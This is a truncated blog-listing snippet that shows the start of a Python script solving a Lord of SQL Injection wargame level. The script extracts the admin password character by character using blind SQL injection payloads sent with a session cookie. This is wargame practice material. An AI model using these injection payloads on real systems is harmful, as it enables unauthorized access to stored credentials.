computer/python1 [LOS] blind sql injection script import requests, string pw = '' cookie = dict(PHPSESSID='8osfaao6p2u8dpb526iq2mhno2') for i in range(1, 9): for strings in string.digits + string.ascii_letters: url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw='or id='admin'%26%26ascii(substr(pw," + str(i) + ",1))=" + str(ord(strings)) +"%23" req = requests.get(url, cookies = cookie) if req.text.find("Hello admin") >.. 2018. 4. 28. 이전 1 다음